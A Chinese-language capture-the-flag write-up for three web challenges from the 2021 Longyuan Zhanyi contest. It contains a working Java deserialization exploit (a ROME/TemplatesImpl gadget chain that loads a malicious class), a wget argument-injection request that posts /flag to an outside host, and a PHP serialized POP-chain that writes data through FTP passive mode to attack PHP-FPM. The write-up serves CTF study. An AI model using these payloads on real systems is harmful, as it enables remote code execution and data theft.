陇原战疫2021-WEB-WriteUp

EasyJaba

感觉这种上来就反序列化的题以后就不会咋出现了。有点像很久以前刚开始拿PHP做CTF考题的时候,不过这种题更多是帮助我这种菜鸡复习下基础。java出太难了我也不会,哈哈哈哈哈。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
BlacklistObjectInputStream
protected Class<?> resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException {
if (this.blacklist.contains(cls.getName())) {
throw new InvalidClassException("Unexpected serialized class", cls.getName());
} else {
return super.resolveClass(cls);
}
}
Set blacklist = new HashSet() {
{
this.add("java.util.HashMap");
this.add("javax.management.BadAttributeValueExpException");
}
};

不能用这两个,有remo的依赖

map换成Hashtable就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
package lyzy.ctf.ezjaba.payload;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;

import javax.xml.transform.Templates;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Hashtable;


public class exp {
public static void main(String[] args) throws Exception {

// 生成包含恶意类字节码的 TemplatesImpl 类

InputStream inputStream = evil.class.getResourceAsStream("evil.class");
byte[] bytes = new byte[inputStream.available()];
inputStream.read(bytes);

TemplatesImpl tmpl = new TemplatesImpl();
Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
Reflections.setAccessible(bytecodes);
Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][]{bytes});

Field name=Reflections.getField(tmpl.getClass(),"_name");
Reflections.setAccessible(name);
Reflections.setFieldValue(tmpl,"_name","Siebene");
Reflections.setFieldValue(tmpl, "_tfactory", new TransformerFactoryImpl());

// 使用 TemplatesImpl 初始化被包装类,使其 ToStringBean 也使用 TemplatesImpl 初始化
ObjectBean delegate = new ObjectBean(Templates.class, tmpl);

// 使用 ObjectBean 封装这个类,使其在调用 hashCode 时会调用 ObjectBean 的 toString
// 先封装一个无害的类
ObjectBean root = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "Sie"));

// 放入 Map 中
Hashtable map = new Hashtable();
map.put(root,"Sie");


// put 到 map 之后再反射写进去,避免触发漏洞
Field field = ObjectBean.class.getDeclaredField("_equalsBean");
field.setAccessible(true);
field.set(root, new EqualsBean(ObjectBean.class, delegate));
System.out.print(Serialize.serialize(map));


}
}

evil.class用spring通用回显的就行了,用我上次哪个就行了哈

CheckIN

一道go简单审计

直接wget外带就行了

/wget?argv=1&argv=–post-file&argv=/flag&argv=http://ip

eaaasyphp

被考烂了的ftp被动模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
 <?php

class Check {
public static $str1 = false;
public static $str2 = false;
}


class Esle {
public function __wakeup()
{
Check::$str1 = true;
}
}


class Hint {


public function __wakeup(){

$this->hint = "no hint";
}

public function __destruct(){

if(!$this->hint){
$this->hint = "phpinfo";
($this->hint)();
}
}
}


class Bunny {
public function __construct(){
$this->filename="ftp://ip:port/";
}

public function __toString()
{
if (Check::$str2) {
if(!$this->data){
echo "done !!!!\n";
$this->data = $_REQUEST['data'];
}
file_put_contents($this->filename, $this->data);
} else {
throw new Error("Error");
}
}
}

class Welcome {

public function __construct(){
$this->username=new Bunny();
}
public function __invoke()
{
Check::$str2 = true;
return "Welcome" . $this->username;
}
}

class Bypass {

public function __construct($s){
if($s==1){
$this->str4=new Welcome();
}
else{
$this->str=new Hint();
}
}

public function __destruct()
{
if (Check::$str1) {
($this->str4)();
} else {
throw new Error("Error");
}
}
}

echo urlencode(serialize(array(new Esle(),new Bypass(1))));

然后?data=xxxxxxxx,这里直接传打fpm的二进制流就行了

还有两道题,一道smtp,当时没时间看了,后来看了guoke爷爷的wp会了

还有一道rss blog也是0解,好像下次还会接着用吧